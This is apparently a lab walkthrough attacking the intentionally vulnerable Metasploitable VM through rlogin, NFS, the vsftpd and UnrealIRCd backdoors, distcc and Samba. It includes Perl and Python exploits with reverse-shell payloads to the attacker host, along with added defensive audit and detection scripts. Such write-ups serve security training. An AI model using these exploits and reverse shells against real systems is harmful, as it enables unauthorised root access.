Metasploitable IP : 192.168.56.101
Attacker Machine IP : 192.168.56.1
Now starting with an nmap scan:
ajay@Test:~$ nmap -sV -p1-10000 192.168.56.101
Starting Nmap 7.60SVN ( https://nmap.org ) at 2017-11-12 06:38 EST
Nmap scan report for 192.168.56.101
Host is up (0.0028s latency).
Not shown: 9974 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open shell Netkit rshd
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
6697/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.77 seconds
rlogin:
In the scan above, TCP ports 512, 513 and 514 are the Berkeley "r" services (rexec, rlogin, rsh). They have been misconfigured to allow remote access from any host (the classic ".rhosts + +" situation). To exploit this configuration we need to install rsh-client on Ubuntu ("apt-get install rsh-client"), then run this command in a root terminal:
root@Test:~# rlogin -l root 192.168.56.101
Last login: Sun Nov 12 06:23:25 EST 2017 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:~#
If the rsh tools are not installed, the rlogin command falls back to ssh (on Ubuntu it is then provided by openssh-client) and will ask for SSH keys instead.
NFS (Network File System) misconfiguration:
NFS can be identified by probing port 2049 directly or by asking the portmapper for a list of registered services. First make sure the rpcbind and nfs-common packages are installed properly; to install them type 'apt-get install rpcbind' (rpcinfo is part of rpcbind; showmount, used below, comes with nfs-common). Now we use rpcinfo to identify NFS:
root@Test:~# rpcinfo -p 192.168.56.101
program vers proto port service
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100024 1 udp 43295 status
100024 1 tcp 57457 status
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100003 4 udp 2049 nfs
100021 1 udp 55770 nlockmgr
100021 3 udp 55770 nlockmgr
100021 4 udp 55770 nlockmgr
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100021 1 tcp 50302 nlockmgr
100021 3 tcp 50302 nlockmgr
100021 4 tcp 50302 nlockmgr
100005 1 udp 53964 mountd
100005 1 tcp 42995 mountd
100005 2 udp 53964 mountd
100005 2 tcp 42995 mountd
100005 3 udp 53964 mountd
100005 3 tcp 42995 mountd
root@Test:~#
The '-p' flag probes the portmapper on the given host and lists the registered RPC programs, which is where the nfs (100003) and mountd (100005) entries above come from. Now use the showmount utility to determine the NFS mount information (to install it, type 'apt-get install nfs-common'):
root@Test:~# showmount -e 192.168.56.101
Export list for 192.168.56.101:
/ *
root@Test:~#
The '-e' flag shows the server's export list; '/ *' means the root filesystem is exported, and the '*' means it is exported to every host. Now we can get access through the ssh daemon. To do this we generate a new ssh key on the attacking system, mount the NFS export, and add our public key to the root account's authorized_keys. First, generate the ssh keys:
root@Test:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Created directory '/root/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:az/b1xAxStYiHyADuHlXeqnsLo1S+81SqTJiE04Vlbg root@SecLab
The key's randomart image is:
+---[RSA 2048]----+
| ..++... . |
| . o .oo = + |
| o o o * + o |
| o E o o o . |
| o oSo . . |
| o . o.o . |
| o o =oo o |
| * *.=+.. . .|
| . + *o.=o.. |
+----[SHA256]-----+
Now we need to mount the server's exported filesystem, which is its root, and append the attacker's public key to root's authorized_keys on the server:
root@Test:~# mkdir /tmp/r00t
root@Test:~# mount -t nfs 192.168.56.101:/ /tmp/r00t/
root@Test:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys
root@Test:~# umount /tmp/r00t/
Now just ssh into the target VM:
root@Test:~# ssh root@192.168.56.101
Last login: Sun Nov 12 07:19:33 2017 from 192.168.56.1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~# whoami
root
root@metasploitable:~#
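An added audit example, not part of the original post, that covers both the rlogin and the NFS steps above: it flags the trust entries that make them work, a '+ +' wildcard in hosts.equiv or .rhosts and /etc/exports lines like the '/ *' that showmount reported. The file contents it checks are constructed samples; the functions take text, so they can be run on a real host's own files.

```python
import re
from typing import Iterator, List, Tuple

# constructed: what a '.rhosts + +' box looks like
SAMPLE_HOSTS_EQUIV = "# trust everyone\n+ +\n"
# constructed: a '/ *' export like showmount reported, plus a sane one and
# the classic 'host (opts)' typo, which grants the options to every host
SAMPLE_EXPORTS = """/ *(rw,no_root_squash)
/srv/share 192.168.56.0/24(ro,root_squash)
/home (rw)
"""


def _uncommented(text: str) -> Iterator[Tuple[int, str]]:
    """Yield (line number, line) for lines that are not blank or comments."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if line:
            yield lineno, line


def audit_rhosts(text: str, source: str = "hosts.equiv") -> List[str]:
    """Flag wildcard entries in rhosts/hosts.equiv syntax: 'host [user]'."""
    findings = []
    for lineno, line in _uncommented(text):
        parts = line.split()
        host, user = parts[0], (parts[1] if len(parts) > 1 else None)
        if host == "+":
            who = "every user on every host" if user == "+" else "every host"
            findings.append(f"{source}:{lineno}: '+' wildcard trusts {who}")
        elif user == "+":
            findings.append(f"{source}:{lineno}: every user on {host} is trusted")
    return findings


def audit_exports(text: str) -> List[str]:
    """Flag exports reachable by any host, writable, or without root_squash."""
    findings = []
    for lineno, line in _uncommented(text):
        parts = line.split()
        path, clients = parts[0], parts[1:] or ["*"]  # no client list = world
        for token in clients:
            m = re.match(r"^([^(]*)(?:\((.*)\))?$", token)
            if m is None:  # malformed token, leave it to exportfs to reject
                continue
            host = m.group(1) or "*"  # '(opts)' with no host also means world
            opts = set(filter(None, (m.group(2) or "").split(",")))
            where = f"exports:{lineno}: {path} -> {host}"
            if host == "*":
                findings.append(f"{where}: exported to every host")
            if path == "/":
                findings.append(f"{where}: whole root filesystem exported")
            if "rw" in opts and "ro" not in opts:
                findings.append(f"{where}: writable")
            if "no_root_squash" in opts:
                findings.append(f"{where}: no_root_squash, remote root keeps uid 0")
    return findings


if __name__ == "__main__":
    for finding in audit_rhosts(SAMPLE_HOSTS_EQUIV) + audit_exports(SAMPLE_EXPORTS):
        print(finding)
```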
VSFTPD backdoor:
vsftpd is a popular FTP server. This particular version, vsftpd 2.3.4, was backdoored by an unknown intruder. To trigger the backdoor, the attacker needs to supply a smiley face ':)' at the end of the user field at login. First of all we need to identify the vsftpd version:
root@Test:~# nmap -p21 -sV 192.168.56.101
Starting Nmap 7.60SVN ( https://nmap.org ) at 2017-11-12 07:28 EST
Nmap scan report for 192.168.56.101
Host is up (0.00013s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
MAC Address: 08:00:27:55:DD:47 (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.39 seconds
The '-sV' flag is used for version detection. To exploit the backdoor we just trigger it; the daemon then starts listening on port 6200, so we only need to connect to port 6200 on the target system. Note: In my test VM, port 6200 is closed immediately when the triggering process ends. So I just start nc in a while loop so it connects to the target box the instant the backdoor is triggered.
ajay@Test:~$ while true
> do
> nc 192.168.56.101 6200
> done
The commands above try to connect to port 6200 repeatedly; now we trigger the backdoor in another terminal:
root@Test:~# printf "user Test:)\r\n\r\npass test1\r\n\r\n" | nc 192.168.56.101 21
220 (vsFTPd 2.3.4)
331 Please specify the password.
and then it connects to the target system:
ajay@Test:~$ while true
> do
> nc 192.168.56.101 6200
> done
whoami
root
python -c "import pty;pty.spawn('/bin/bash')"
root@metasploitable:/# id
id
uid=0(root) gid=0(root)
root@metasploitable:/# who
who
msfadmin tty1 Nov 12 06:32
root pts/0 Nov 12 06:23 (:0.0)
root@metasploitable:/#
The python -c "import pty;pty.spawn('/bin/bash')" command gets us a proper prompt, which looks cool!! To cancel it, just press Ctrl + C.
Unreal IRCD Backdoor (RCE):
The UnrealIRCd 2.3.8 daemon was backdoored by someone, and this went undetected for 6 to 8 months. The backdoor is triggered by the string "AB", which is sent to the IRC server during the login process along with the other commands. We have a perl exploit for this, available at exploit-db.com; just start the netcat listener and fire the exploit:
#!/usr/bin/perl
use Socket;
use IO::Socket;
# Generating Rshell payload with msfvenom
# msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw
my $payload = 'AB; perl -MIO -e \'$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.56.1:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};\'';
$host = "";
$port = "";
$host = @ARGV[0];
$port = @ARGV[1];
if ($host eq "") { usage(); }
if ($port eq "") { usage(); }
sub usage {
printf "\n Usage: unrealIRCD.pl [TARGET_IP] [TARGET_PORT]\n\n";
exit(1);
}
sub exploit {
my $sockd = IO::Socket::INET->new (PeerAddr => $host, PeerPort => $port, Proto => "tcp") || die "[!] Failed to connect to $host on $port\n\n";
print "[*] Payload sent ...\n";
print $sockd "$payload";
close($sockd);
exit(1);
}
exploit();
Download the above script from here.
Just replace the callback address in the payload (192.168.0.101 in the downloaded script; in the copy shown above it is already changed to 192.168.56.1) with your attacker machine's address. Now first start the nc listener:
ajay@Test:~$ nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
and then fire up the exploit:
root@Test:~# ./unrealIRCD.pl
Usage: unrealIRCD.pl [TARGET_IP] [TARGET_PORT]
root@Test:~# ./unrealIRCD.pl 192.168.56.101 6667
[*] Payload sent ...
root@Test:~#
and then in the nc listener:
ajay@Test:~$ nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [192.168.56.101] port 4444 [tcp/*] accepted (family 2, sport 41732)
root
python -c "import pty;pty.spawn('/bin/bash')"
root@metasploitable:/etc/unreal# ls
ls
Donation               badwords.quit.conf   ircd.log         spamfilter.conf
LICENSE                curl-ca-bundle.crt   ircd.pid         tmp
aliases                dccallow.conf        ircd.tune        unreal
badwords.channel.conf  doc                  modules          unrealircd.conf
badwords.message.conf  help.conf            networks
root@metasploitable:/etc/unreal#
Similarly, we have a python exploit for it.
#!/usr/bin/python
import socket
import argparse
parser = argparse.ArgumentParser(description='UnrealIRCD 2.8.3.1 Backdoor Exploit')
parser.add_argument('-rh', '--rhost', help="IP of the victim")
parser.add_argument('-lh', '--lhost', help="IP of the Attacker")
parser.add_argument('-lp', '--lport', help="Port of the netcat Listener")
parser.add_argument('-rp', '--rport', help="Port of unrealIRCD")
arg = parser.parse_args()
sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockfd.connect((arg.rhost, int(arg.rport)))
sockfd.recv(2048)
sockfd.send("AB; sh -c '(nc " + arg.lhost + " " + arg.lport + " -e /bin/bash) '\n")
sockfd.close()
Download the script from here.
For this, start the nc listener and fire the exploit:
root@Test:~# ./unrealIRCD.py -rh 192.168.56.101 -rp 6667 -lh 192.168.56.1 -lp 4444
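An added detection example, not part of the original post, for the two backdoor triggers described above: the ':)' in the vsftpd USER command and the 'AB' prefix UnrealIRCd reacts to. It goes slightly beyond the text in two ways: it matches ':)' anywhere in the username, which is what the backdoored vsftpd code checks, and it requires 'AB' at the start of the IRC line, so the same bytes inside a message do not fire. The control-channel records are constructed; a real sensor would feed it the reassembled client and server streams for ports 21 and 6667/6697.

```python
import re
from typing import List, Tuple

Record = Tuple[int, str, str]  # (server port, "c2s" or "s2c", one line)

# constructed: the FTP exchange from the vsftpd section, an IRC login that
# carries the UnrealIRCd trigger, and benign lines that must not fire
SAMPLE_STREAM: List[Record] = [
    (21, "s2c", "220 (vsFTPd 2.3.4)"),
    (21, "c2s", "user Test:)"),
    (21, "s2c", "331 Please specify the password."),
    (21, "c2s", "pass test1"),
    (21, "c2s", "USER anonymous"),
    (6667, "c2s", "NICK ajay"),
    (6667, "c2s", "AB; id"),
    (6667, "c2s", "USER ajay 0 * :ajay"),
    (6667, "c2s", "PRIVMSG #chan :AB; same bytes, but not at line start"),
]

FTP_USER = re.compile(r"^USER\s+(.*)$", re.IGNORECASE)  # FTP verbs are case-insensitive
VSFTPD_BANNER = re.compile(r"^220\b.*vsFTPd 2\.3\.4\b")
IRC_PORTS = {6667, 6697}


def detect(stream: List[Record]) -> List[str]:
    """Return one alert per backdoor-trigger signature seen in the stream."""
    alerts = []
    for port, direction, raw in stream:
        line = raw.rstrip("\r\n")
        if port == 21 and direction == "s2c" and VSFTPD_BANNER.match(line):
            alerts.append(f"ftp: banner advertises backdoored vsftpd 2.3.4: {line!r}")
        elif port == 21 and direction == "c2s":
            m = FTP_USER.match(line)
            # the backdoored code fires on the bytes 0x3a 0x29 anywhere in the name
            if m and ":)" in m.group(1):
                alerts.append(f"ftp: vsftpd 2.3.4 backdoor trigger ':)' in USER {m.group(1)!r}")
        elif port in IRC_PORTS and direction == "c2s" and line.startswith("AB"):
            # the backdoor hands everything after a leading 'AB' to system()
            alerts.append(f"irc: UnrealIRCd backdoor trigger at line start: {line!r}")
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_STREAM):
        print(alert)
```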
Ingreslock Backdoor:
Port 1524 is the old "ingreslock" backdoor; connecting to it with nc drops straight into a root shell:
root@Test:~# nc 192.168.56.101 1524
root@metasploitable:/#
Distccd Misconfiguration:
The distcc daemon is running on port 3632. Exploiting it with metasploit (note that the shell comes back as the daemon user, not root):
msf > search distccd
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution
msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > set payload cmd/unix/bind_perl
payload => cmd/unix/bind_perl
msf exploit(distcc_exec) > show options
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 3632 yes The target port (TCP)
Payload options (cmd/unix/bind_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Automatic Target
msf exploit(distcc_exec) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(distcc_exec) > exploit
[*] Started bind handler
[*] Command shell session 1 opened (192.168.56.1:35897 -> 192.168.56.101:4444) at 2017-11-12 09:34:10 -0500
whoami
daemon
python -c "import pty;pty.spawn('/bin/bash')"
daemon@metasploitable:/tmp$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Samba Misconfiguration:
For more info see https://www.samba.org/samba/news/symlink_attack.html
and https://www.rapid7.com/db/modules/auxiliary/admin/smb/samba_symlink_traversal
You need smbclient installed to list the shared folders ('sudo apt-get install smbclient'):
root@Test:~# smbclient -L //192.168.56.101
WARNING: The "syslog" option is deprecated
Enter root's password: < hit enter without password >
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
Server Comment
--------- -------
METASPLOITABLE metasploitable server (Samba 3.0.20-Debian)
Workgroup Master
--------- -------
WORKGROUP METASPLOITABLE
root@Test:~#
Now fire up metasploit:
msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(samba_symlink_traversal) > show options
Module options (auxiliary/admin/smb/samba_symlink_traversal):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
SMBSHARE yes The name of a writeable share on the server
SMBTARGET rootfs yes The name of the directory that should point to the root filesystem
msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp
SMBSHARE => tmp
msf auxiliary(samba_symlink_traversal) > exploit
[*] 192.168.56.101:445 - Connecting to the server...
[*] 192.168.56.101:445 - Trying to mount writeable share 'tmp'...
[*] 192.168.56.101:445 - Trying to link 'rootfs' to the root filesystem...
[*] 192.168.56.101:445 - Now access the following share to browse the root filesystem:
[*] 192.168.56.101:445 - \\192.168.56.101\tmp\rootfs\
[*] Auxiliary module execution completed
msf auxiliary(samba_symlink_traversal) >
Now open another terminal with root privileges:
root@Test:~# smbclient //192.168.56.101/tmp/
WARNING: The "syslog" option is deprecated
Enter root's password: < hit enter without password >
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
smb: \> cd rootfs
smb: \rootfs\> ls
. DR 0 Sun May 20 15:36:12 2012
.. DR 0 Sun May 20 15:36:12 2012
initrd DR 0 Tue Mar 16 19:57:40 2010
media DR 0 Tue Mar 16 19:55:52 2010
bin DR 0 Mon May 14 00:35:33 2012
lost+found DR 0 Tue Mar 16 19:55:15 2010
mnt DR 0 Wed Apr 28 17:16:56 2010
sbin DR 0 Sun May 13 22:54:53 2012
initrd.img R 7929183 Mon May 14 00:35:56 2012
home DR 0 Fri Apr 16 03:16:02 2010
lib DR 0 Mon May 14 00:35:22 2012
usr DR 0 Wed Apr 28 01:06:37 2010
proc DR 0 Sun Nov 12 08:19:16 2017
root DR 0 Sun Nov 12 08:20:00 2017
sys DR 0 Sun Nov 12 08:19:17 2017
boot DR 0 Mon May 14 00:36:28 2012
nohup.out R 10868 Sun Nov 12 08:20:01 2017
etc DR 0 Sun Nov 12 08:19:53 2017
dev DR 0 Sun Nov 12 08:19:39 2017
vmlinuz R 1987288 Thu Apr 10 13:55:41 2008
opt DR 0 Tue Mar 16 19:57:39 2010
var DR 0 Sun May 20 18:30:19 2012
cdrom DR 0 Tue Mar 16 19:55:51 2010
tmp D 0 Sun Nov 12 09:50:34 2017
srv DR 0 Tue Mar 16 19:57:38 2010
7282168 blocks of size 1024. 5427840 blocks available
smb: \rootfs\> cd etc\
smb: \rootfs\etc\> more passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false
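An added configuration audit, not part of the original post or of the Metasploit module: it parses an smb.conf and reports the shares on which the symlink traversal above would work, that is, writable shares with 'unix extensions' (lets a client create symlinks) and 'wide links' (lets them point outside the share) both on, which is the Samba 3.0.x default the linked samba.org advisory describes. SAMPLE_CONF is constructed to resemble the box's writable 'tmp' share; the real input would be /etc/samba/smb.conf.

```python
from typing import Dict, List, Optional

# constructed to resemble the box above: a guest-writable [tmp] share under
# a 3.0.x-era [global] that leaves 'wide links' and 'unix extensions' unset
SAMPLE_CONF = """[global]
   security = share
   ; no 'wide links' / 'unix extensions' line: both default to yes on 3.0.x
[tmp]
   comment = oh noes!
   path = /tmp
   writeable = yes
   guest ok = yes
[opt]
   path = /opt
   read only = yes
"""

TRUE_WORDS = {"yes", "true", "1"}

def parse_smb_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal smb.conf reader: [section] headers and 'key = value' lines."""
    sections: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][" ".join(key.lower().split())] = value.strip()
    return sections

def _flag(share: Dict[str, str], glob: Dict[str, str], *names: str) -> Optional[bool]:
    """Boolean lookup with synonyms; a share-level setting wins over [global]."""
    for scope in (share, glob):
        for name in names:
            if name in scope:
                return scope[name].lower() in TRUE_WORDS
    return None

def audit_smb_conf(text: str) -> List[str]:
    """List shares where a client-created symlink can reach the whole filesystem."""
    conf = parse_smb_conf(text)
    glob = conf.get("global", {})
    findings = []
    for name, share in conf.items():
        if name == "global":
            continue
        writable = _flag(share, glob, "writeable", "writable", "write ok")
        if writable is None:  # then 'read only' decides; its default is yes
            writable = _flag(share, glob, "read only") is False
        # Samba 3.0.x defaults: both are yes unless explicitly turned off
        unix_ext = _flag(share, glob, "unix extensions") is not False
        wide_links = _flag(share, glob, "wide links") is not False
        guest = _flag(share, glob, "guest ok", "public") is True
        if writable and unix_ext and wide_links:
            findings.append(
                f"[{name}]: {'guest-writable' if guest else 'writable'} share with "
                "unix extensions and wide links on; a symlink created here escapes "
                "the share (set 'wide links = no' or 'unix extensions = no')")
    return findings

if __name__ == "__main__":
    for finding in audit_smb_conf(SAMPLE_CONF):
        print(finding)
```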
Now that's enough for today. I hope you enjoyed reading. Thank you.